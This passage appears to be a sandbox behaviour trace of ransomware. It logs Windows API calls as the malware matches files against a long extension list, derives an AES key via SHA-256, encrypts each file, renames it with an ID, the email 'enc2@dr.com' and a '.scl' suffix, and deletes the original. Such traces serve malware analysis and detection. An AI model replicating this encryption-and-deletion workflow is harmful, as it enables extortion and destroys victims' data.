lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.450] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.450] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.450] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.453] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3109, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x3109, lpOverlapped=0x0) returned 1
	[0190.455] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.455] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb330) returned 1
	[0190.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.460] CryptCreateHash (in: hProv=0xfcb330, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0190.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.461] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.461] CryptDeriveKey (in: hProv=0xfcb330, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0190.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.461] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x3109, dwBufLen=0x3109 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x3110) returned 1
	[0190.462] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.462] RtlMoveMemory (in: Destination=0xfe0298, Source=0xfdd180, Length=0x3109 | out: Destination=0xfe0298) 
	[0190.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.462] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0298*, pdwDataLen=0x18bc0c*=0x3109, dwBufLen=0x3110 | out: pbData=0xfe0298*, pdwDataLen=0x18bc0c*=0x3110) returned 1
	[0190.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.462] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0190.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.463] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0190.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.463] CryptReleaseContext (hProv=0xfcb330, dwFlags=0x0) returned 1
	[0190.463] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.463] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.464] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0190.465] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 92
	[0190.466] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.466] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe0298*, nNumberOfBytesToWrite=0x3110, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe0298*, lpNumberOfBytesWritten=0x18c068*=0x3110, lpOverlapped=0x0) returned 1
	[0190.469] CloseHandle (hObject=0x2c0) returned 1
	[0190.469] CloseHandle (hObject=0x384) returned 1
	[0190.470] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a")) returned 1
	[0190.577] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a")) returned 0
	[0190.577] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa2bf30, ftCreationTime.dwHighDateTime=0x1d96661, ftLastAccessTime.dwLowDateTime=0xc8f8570, ftLastAccessTime.dwHighDateTime=0x1d96c31, ftLastWriteTime.dwLowDateTime=0xc8f8570, ftLastWriteTime.dwHighDateTime=0x1d96c31, nFileSizeHigh=0x0, nFileSizeLow=0x1103f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HTFjVRtf5ZHv-gvv.wav", cAlternateFileName="HTFJVR~1.WAV")) returned 1
	[0190.577] lstrcmpW (lpString1="HTFjVRtf5ZHv-gvv.wav", lpString2="..") returned 1
	[0190.577] lstrcmpW (lpString1="HTFjVRtf5ZHv-gvv.wav", lpString2=".") returned 1
	[0190.577] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.577] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="HTFjVRtf5ZHv-gvv.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\HTFjVRtf5ZHv-gvv.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\HTFjVRtf5ZHv-gvv.wav"
	[0190.577] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\HTFjVRtf5ZHv-gvv.wav") returned 48
	[0190.577] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.578] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\HTFjVRtf5ZHv-gvv.wav", cchLength=0x30 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav") returned 0x30
	[0190.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.578] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.578] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav"
	[0190.578] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav") returned 48
	[0190.578] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.579] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0190.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.579] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.579] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.579] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.580] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.586] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1103f, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x1103f, lpOverlapped=0x0) returned 1
	[0190.589] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.590] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0190.592] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.592] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0190.592] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.592] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.592] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.593] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0190.593] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.593] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x1103f, dwBufLen=0x1103f | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x11040) returned 1
	[0190.595] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.596] RtlMoveMemory (in: Destination=0xfee1c8, Source=0xfdd180, Length=0x1103f | out: Destination=0xfee1c8) 
	[0190.596] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.596] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfee1c8*, pdwDataLen=0x18bc0c*=0x1103f, dwBufLen=0x11040 | out: pbData=0xfee1c8*, pdwDataLen=0x18bc0c*=0x11040) returned 1
	[0190.599] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.600] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0190.600] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.600] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0190.600] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.600] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0190.600] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.601] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.601] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.601] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
